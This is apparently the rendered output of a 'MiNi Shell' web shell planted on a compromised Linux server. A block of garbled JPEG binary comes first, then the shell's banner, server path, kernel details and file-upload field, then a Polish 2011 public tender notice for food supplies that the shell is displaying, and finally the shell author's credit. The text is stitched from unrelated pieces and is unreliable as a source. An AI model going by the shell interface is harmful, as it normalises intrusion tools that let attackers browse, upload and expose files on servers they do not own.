JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111207/415616-N-2011.html

<p class="kh_header"><b>Olsztynek: Sukcesywne dostawy art. spożywczych, mięsa wieprzowego - wołowego produktów mięsnych, wędlin, mrożonek</b><br>
<b>Numer ogłoszenia: 415616 - 2011; data zamieszczenia: 07.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pozaszkolna Placówka Specjalistyczna Szkolny Ośrodek Wypoczynkowy "Syrenka" w Marózie , Maróz 5, 11-015 Olsztynek, woj. warmińsko-mazurskie, tel. 89 513 92 15, faks 89 513 92 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osrodeksyrenka.pl , sowsyrenka.bip.um.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy art. spożywczych, mięsa wieprzowego - wołowego produktów mięsnych, wędlin, mrożonek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> MIĘSO I PRODUKTY MIĘSNE antrykot wołowy bk	 kg 	10 wołowina zrazowa bk	 kg 	20 karkówka wieprzowa bk kg 230 łopatka wieprzowa bk	 kg 	120 Schab z/k	kg	30 schab b/k	 kg 	300 szynka wieprzowa bk	 kg 	150 mięso  wieprzowe drobne b/k	 kg 	900 żeberka wieprzowe  paski	kg	20 żeberka wieprzowe  grube	 kg 	20 boczek świeży bż	 kg 	120 pachwina	 kg 	5 golonka wp	 kg 	15 kości schabowe 	 kg 	200 słonina	 kg 	30 nogi wieprzowe	 kg 	15 wątroba wieprzowa	 kg 	50 smalec wieprzowy kg 5 WĘDLINY I WYROBY WĘDLINIARSKIE kiełbasa jałowcowa	5 Kiełbasa biała surowa wieprzowa	150 kiełbasa biała parzona wieprzowa	10Nkiełbasa piwna 	75
kiełbasa szynkowa 	120 kiełbasa krakowska parzona	100 kiełbasa krakowska sucha	60 kiełbasa żywiecka 	60 kiełbasa metka cebulowa	5
kiełbasa metka łososiowa	5 kiełbasa myśliwska	5 kiełbasa salami	25
szynka mielona	90 szynka konserwowa 	35 golonka konserwowa 	25
kiełbasa zwyczajna 	350 kiełbasa toruńska	50 kabanosy	15 kiełbasa śląska	150 kiełbasa szynkowa wołowa	5 polędwica sopocka	150 polędwica wieprzowa wędzona	70 ogonówka 	150 baleron 	70 szynka wędz 	200 szynka gotowana  	30 Boczek wędzony parzony bk	150 Słonina wędzona	5 Kaszanka gryczana	20 Kaszanka cienka	25 Kaszanka jęczmienna	80  Kiszka ziemniaczana	30 Salceson włoski	5 Salceson ozorowy	5 Pasztet wieprzowy	80 pasztetowa	80 Kości schabowe wędzone	15 Parówki wieprzowe cienkie	180 Serdelki wieprzowe	180 Mortadela	280 Pieczeń wieprzowa	50
Wędzona	30 Pieczeń litewska	30 Schab pieczony	15 Mortadela z przyprawami	15 DRÓB I MIĘSA DROBIOWE filet z kurczaka bs	300
filet z indyka bs	180 kurczaki 	350 skrzydełka z kurczaka 	150
udko z kurczaka 	180 pałki z kurczaka	180 Porcje rosołowe	10 wątróbka z kurczaka	10 żołądki z kurczaka	30 ART. SPOŻYWCZE ananas konserwowy 	 kg 	30 brzoskwinia konserwowa  	 kg 	30 mandarynka konserwowa	kg	
rodzynki suszone  	 kg 	15 syrop owocowy 	 kg 	10 zaprawa kompotowa wieloowocowa 	 kg 	5 zaprawa kompotowa wiśniowa	 kg 	5 zaprawa kompotowa truskawkowa	 kg 	5 rosół z kury 	 kg 	15   bulion grzybowy 	 kg 	2 bulion warzywny 	 kg 	2 bulion wołowy	 kg 	5 sos pieczeniowy  	 kg 	1 sos myśliwski  	 kg 	3 sos ogrodowy,sałatkowy  	 kg 	15
sos słodko kwaśny	 kg 	2 Sos grzybowy	kg	10 sos z zielonym pieprzem	 kg	2sos boloński 	 kg 	10 zupa w proszku-żurek 	 kg 	25
barszcz w proszku czerwony	 kg 	20 budyń  	 kg 	10 galaretka owocowa 	 kg 	15 żelatyna spożywcza drobiowa 	 kg 	8 kisiel 	 kg 	15 wiórki kokosowe	 kg 	1 soda 	 kg 	1 cukier waniliowy 	 kg 	8 cynamon mielony 	 kg 	1
drożdże suszone	 kg 	2 gałka muszkatołowa mielona  	 kg 	1 goździk	 kg 	1
kwasek cytrynowy 	 kg 	10 liść laurowy   	 kg 	1 majeranek  	 kg 	2 papryka mielona słodka 	 kg 	6 chilii	 kg 	1 pieprz naturalny mielony 	 kg 	20 proszek do pieczenia 	 kg 	1kminek 	 kg 	1 oregano	 kg 	1 owoc jałowca suszony	 kg 	1przyprawa w płynie	 kg 	10 przyprawa warzywna	 kg 	250 migdały	 kg 	1 pieprz ziołowy	 kg 	1 rozmaryn	 kg 	1 orzechy laskowe	 kg 	3 orzechy włoskie	 kg 	3 imbir mielony	 kg 	1 kolendra	 kg 	1
sezam	 kg 	5 przyprawa do flaków	 kg 	3 przyprawa do drobiu	 kg 	10
przyprawa do ryb	 kg 	1 przyprawa gyros	 kg 	3 przyprawa do mięs	 kg 	18 przyprawa do grila	 kg 	5 przyprawa carry	 kg 	1 przyprawa bazylia	 kg 	1 przyprawa kebab	kg	2 przyprawa do karkówki	kg	5 przyprawa tymianek	 kg 	1 ziele angielskie 	 kg 	2 zioła prowensalskie 	 kg 	1
czosnek granulowany	 kg 	15 cukier biały kryształ 	 kg 	1800 cukier biały kryształ kostka	 kg 	2 cukier biały kryształ saszetka 	 kg 	2 cukier puder  	 kg 	30 kasza gryczana prażona	 kg 	30 kasza jęczmienna  średnia	 kg 	30
kasza jęczmienna  gruba	 kg 	5 kasza manna 	 kg 	40 fasola sucha średnia	 kg 	30 fasola drobna	 	30 fasola sucha jaś	 kg 	30 groch łuskany połółwki	 kg 	35 makaron  nitki cięte	 kg 	50 makaron  spagetti	 kg 	80
makaron  kolanka	 kg 	50 makaron  świderki	 kg 	80 makaron  muszelki	 kg 	50 makaron  zacierka	 kg 	50 makaron  łazanki	 kg 	50  makaron  wstążki	 kg 	20 makaron  gniazdka	 kg 	20 mąka pszenna  typ 550	 kg 	1400
mąka ziemniaczana  	 kg 	50 płatki kukurydziane 	 kg 	50 płatki zbożowe miodowe	 kg 	20 płatki zbożowe orzechowe	 kg 	20 płatki zbożowe czekoladowe	 kg 	50 musli morelowe	 kg 	2 musli truskawkowe	 kg 	2
musli jabłkowe	 kg 	2 płatki owsiane 	 kg 	20 ryż biały  	 kg 	300
ryż ciemny  	 kg 	10 sól kuchenna 	 kg 	300 chrzan tarty w occie	 kg 	30 ćwikła 	 kg 	5 ketchup łagodny 	 kg 	280  ketchup w saszetkach	 kg 	2
ketchup z zielonych pomidorów 	 kg 	5 musztarda 	 kg 	120 musztarda w saszetkach	 kg 	5 fasolka szparagowa konserwowa 	 kg 	50 fasola czerwona konserwowa 	 kg 	50 fasola biała konserwowa 	 kg 	5 groszek konserwowy 	 kg 	70 koncentrat pomidorowy 	 kg 	150 ogórek korniszon 	 kg 	400
oliwki konserwowe  	 kg 	10 papryka konserwowa 	 kg 	130 szczaw konserwowy 	 kg 	50 kukurydza konserwowa 	 kg 	110 majonez 	 kg 	220 cebula perłowa w zalewie octowej 	 kg 	3 czosnek marynowany 	 kg 	3
kukurydza konserwowa minikolby 	 kg 	3 pieczarka konserwowa 	 kg 	25
pomidory konserwowe 	 kg 	5 ocet	  l	65 sok pomidorowy	  l 	30
dżem różne smaki	 kg 	150 dżem w saszetkach 25g (różne smaki)	 kg 	5
powidła ślowkowe	 kg 	30 żurawina	 kg 	5miód naturalny 	 kg 	15
miód w saszetkach	 kg 	5 olej słonecznikowy  l 	20 olej sojowy     	 l 	20 olej rzepakowy  l 1400oliwa z oliwek  l 	5 paprykarz szcz	 kg 	20
konserwa rybna makrela w pomidorach	 kg 	40 konserwa rybna makrelaw oleju	 kg 	30 konserwa rybna szprot w oleju	 kg 	5 konserwa rybna szprot w pomidorach	 kg 	5 konserwa rybna śledź w oleju kg 	10 konserwa rybna śledź w pomidorach	 kg 	10 szprot podwędzany w oleju	 kg 	5 tuńczyk sałatkowy	 kg 	15 pasztet z indyka	 kg 	10 łopatka konserwowa	 kg 	10 szynka konserwowa 	 kg 	10 napój owocowy karton 1 l	 l 	1500 sok  owocowykarton 1 l	 l 	100 napój owocowy karton 0,2 l	 l 	0150
woda mineralna n/ gaz 1,5 I	 l 	1000 woda mineralna  gaz 1,5 	 l 	800
woda mineralna niegaz.  500ml 	 l 	1900 Herbata ekspresowa z zawieszką 	Kg	10 herbata expresowa  	 kg 	30 kakao opak   	 kg 	20 kawa  rozpuszczalna w saszetkach  	 kg 	12 kawa naturalna mielona 	 kg 	30 kawa naturalna rozpuszczalna 	 kg 	15 kawa capucino 	 kg 	2 kawa capucino w saszetkach	 kg 	2 herbatniki	 kg 	60 paluszki słone	 kg 	40 herbatniki w polewie	kg	60 baton  czekooladowy z orzechami 	 kg 	50 baton czekoladowy z karmelem	 kg 	50 baton czekoladowy z nadzieniem mlecznym	 kg 	50
baton czekoladowy z nadzieniem owocowym	 kg 	10 napój kakaowy	 kg 	3
wafel przekładany  w polewie czekoladowej	 kg 	20 herbata witaminizowana	 kg 	3 delicje	 kg 	5 wafle kakaowe w polewie luz	 kg 	10 wafle kakaowe bez polewy luz	 kg 	10 pierniki w czekoladzie luz	 kg 	5 markizy luz	 kg 	10 czekolada mleczna	 kg 	5 czekolada nadziewana	 kg 	5 czekolada z bakaliami	 kg 	5 ptasie mleczko	 kg 	5 cukierki witaminizowane	 kg 	10
krem czekoladowy	 kg 	100 Chipsy różne smaki	 Kg	10 Ciastka zbożowe	Kg	10 Chrupki kukurydziane	 Kg 10 Sos sojowy	kg	5 WYROBY GARMAŻERYJNE  brokuły mrożone 	 kg 	200 brukselka mrożona 	 kg 	80
fasolka szparagowa mrozona 	 kg 	150 kalafior mrożony 	 kg 	200
marchew mrożona 	 kg 	220 mieszanka warzywna 2 - skład	 kg 	50
mieszanka warzywna mrożona 4-skład	 kg 	300 mieszanka warzywna mrożona 7-skład	 kg 	60 mieszanka chińska	 kg 	40 szpinak mrożony	 kg 	25
malina mrożona 	 kg 	5 wiśnia bez pestek mrożona 	 kg 	5 truskawka mrożona	 kg 	180 owoce mrożone mieszanka 	 kg 	300 lody owocowe	 kg 	20
lody czekoladowe	kg	20 lody waniliowe	 kg 	20 pierogi ruskie	 kg 	30
pierogi z serem 	 kg 	50 pierogi z jagodami	 kg 	50 pierogi z truskawkami	 kg 	30 pierogi z mięsem	 kg 	40 pierogi z kapustą i grzybami	kg	10
pyzy mięsne 	 kg 	40 pyzy ziemniaczane	 kg 	40 knedle z owocami 	 kg 	40 talarki ziemniaczane	kg	20 kulki ziemniaczane	kg	20 kostki lodu	kg	5
ciasto francuskie	kg	10 uszka z kapustą i grzybami	 kg 	5 dorsz filet	 kg 	30
filet z morszczuka	 kg 	50 filet z pangi	 kg 	180 paluszki rybne	kg	50
filet z flądry	kg	50kostka z mintaja	 kg 	15.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.40.00.00-2, 15.11.00.00-2, 15.80.00.00-6, 15.86.00.00-4, 15.22.00.00-6, 15.33.11.00-8, 15.33.00.00-0, 15.31.00.00-4, 15.30.00.00-1, 15.24.00.00-2, 15.20.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia, że 1.1 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 1.2 Posiadają wiedzę i doświadczenie do wykonania zamówienia. 1.3 Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. 1.4 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)oświadczenie o spełnieniu warunków udziału w postępowaniu art.22 Pzp. b)oświadczenie, że zakład ma
wdrożony system HACCP lub GMP i GHP; c)formularz ofertowy; d)formularz cenowy; e)ważną decyzję o
dopuszczeniu samochodu do przewozu żywności HDI (Dz. U z 2003r. Nr21 poz.179)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osrodeksyrenka.pl , sowsyrenka.bip.um.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego bud.
Złota Rybka pok. nr. 2..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2011 godzina 12:00, miejsce: budynek Złota Rybka pok. nr. 2..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MIĘSO WIEPRZOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy według potrzeb zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.11.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy według potrzeb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO DROBIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy według potrzeb zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.23.00-9, 15.13.15.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ART. SPOŻYWCZE..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy według potrzeb zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.43.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WYROBY GARMAŻERYJNE, RYBY MROŻONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy według potrzeb zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0, 15.31.00.00-4, 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com